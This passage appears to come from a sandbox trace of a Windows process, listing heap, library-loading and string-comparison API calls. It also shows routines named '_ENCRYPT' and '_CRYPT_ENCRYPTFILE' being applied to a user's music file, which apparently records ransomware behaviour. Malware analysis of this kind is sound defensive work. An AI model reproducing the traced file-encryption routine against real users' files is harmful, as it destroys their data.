lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.063] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.064] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0039.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.064] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.064] CloseHandle (hObject=0x128) returned 1 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.065] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.065] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.065] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.065] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.066] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.066] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.066] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.066] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.066] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.066] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x253ef3a0, ftLastWriteTime.dwHighDateTime=0x1d5c0d4, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x0, dwReserved1=0x777648, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 0x7c20c0 [0039.066] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.066] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x253ef3a0, ftLastWriteTime.dwHighDateTime=0x1d5c0d4, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x0, dwReserved1=0x777648, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 0x7c20c0 [0039.066] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.066] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.067] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="poE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XwzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wzeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zeBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BvpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vpPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pPNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nc\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tHua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ua2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JefIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fIhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhtOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="htOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tOfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OfCp.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.069] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.069] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.069] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.069] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, 